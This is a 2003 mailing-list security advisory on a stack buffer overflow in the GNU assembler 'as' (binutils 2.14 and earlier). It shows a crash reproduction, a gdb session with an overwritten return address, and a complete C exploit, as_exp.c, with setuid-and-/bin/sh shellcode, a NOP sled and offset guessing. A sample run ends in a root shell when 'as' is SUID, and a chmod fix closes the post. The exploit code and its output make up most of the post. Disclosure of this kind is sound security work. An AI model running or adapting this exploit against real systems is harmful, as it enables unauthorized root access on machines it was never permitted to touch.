bug-gnu-utils
[Top][All Lists]
Advanced
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

No System Security Advisory #1

From: CoKi
Subject: No System Security Advisory #1
Date: Tue, 19 Aug 2003 01:36:10 -0300
User-agent: KMail/1.5 
-------------------------------------------------
No System Security Advisory #1 - 19/08/03
-------------------------------------------------
Program:  as - The GNU assembler
Homepage:  http://sources.redhat.com/binutils/
Vulnerable Versions: GNU binutils 2.14 and prior
Risk: Low / Medium
Impact: Stack Buffer Overflow
-------------------------------------------------


- DESCRIPTION
-------------------------------------------------
The GNU Binutils are a collection of binary tools.
'as' is the GBU assembler.

More informations at: http://sources.redhat.com/binutils/


- DETAILS
-------------------------------------------------
$ /usr/bin/as `perl -e 'print "A" x 2005'`
Segmentation fault

Now we proceed to open gdb to view what may have occured.

$gdb /usr/bin/as
GNU gdb 5.3
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-slackware-linux"...
(no debugging symbols found)...
(gdb) r `perl -e 'print "A" x 2005'`
Starting program: /usr/bin/as `perl -e 'print "A" x 2005'`
Assembler messages:
Error: can't open AAAAAAAAAAAAAAA..........AAAAA...
..........AAAAAAA for reading
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) i r ebp eip esp
ebp            0x41414141       0x41414141
eip            0x41414141       0x41414141
esp            0xbffff090       0xbffff090
(gdb)

Here as you can see we are able to gain the return address.
Return : 0xbfffe890.


3 - EXPLOIT
-------------------------------------------------
I have done minimal testing on this.
It has been tested on Slackware 9.0 and Red Hat 7.2

------------------- as_exp.c --------------------
/* Linux 'as' buffer overflow

   This will give you a root shell if /usr/bin/as is SUID,
   which isn't by default.

   Use: ./as_exp [offset]

   Try offsets 300-400
   Tested on Slackware 9.0 and Red Hat 7.2

   by CoKi <address@hidden>
   No System Group - http://www.nosystem.com.ar
*/

#include <stdio.h>

#define OFFSET 350

long esp(void);

int main(int argc, char *argv[]) {

  char buf[2005];
  char shellcode[]=
    "\xb0\x31\xcd\x80\x89\xc3\x31\xc0\xb0\x17\xcd\x80"
    "\x31\xdb\x31\xc0\xb0\x17\xcd\x80"
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x89\x46\x0c\x88\x46\x07"
    "\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
    "\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
  int i, off;
  long ret;

  if(argc>1) {
    off = atoi(argv[1]);
  }

  else off = OFFSET;

  ret = (esp() - off);
  printf("\n'as' buffer overflow by CoKi\n");
  printf("----------------------------\n\n");
  printf("Return Address: 0x%lx\nOffset: %d\n\n", ret, off);

  for(i=0;i<2005;i+=4)
    *(unsigned long *)&buf[i]=0x90909090;

  *(unsigned long *)&buf[2005 - 4]=ret;
  *(unsigned long *)&buf[2005 - 8]=ret;

  memcpy(buf + 2005 - strlen(shellcode) - 8, shellcode, strlen(shellcode));
  execlp("/usr/bin/as","as",buf,0);
}

long esp(void){
  __asm__("movl %esp,%eax");
}
------------------- as_exp.c --------------------

$ gcc -o as_exp as_exp.c
$ ./as_exp 390

'as' buffer overflow by CoKi
----------------------------

Return Address: 0xbffff002
Offset: 390

Assembler messages:
Error: can't open ............
.................../bin/sh ..... for reading

sh-2.05b# id
uid=0(root) gid=100(users) groups=100(users)
sh-2.05b#

This will give you a root shell if /usr/bin/as is SUID, which isn't by
default.


- SOLUTIONS
-------------------------------------------------
Remove suid permissions on the program if it has them

#chmod u-s /usr/bin/as


- REFERENCES
-------------------------------------------------
http://www.nosystem.com.ar/advisories/advisory-01.txt


- CREDITS
-------------------------------------------------
Discovered by CoKi <address@hidden>

No System Group - http://www.nosystem.com.ar
reply via email to
[Prev in Thread] Current Thread [Next in Thread]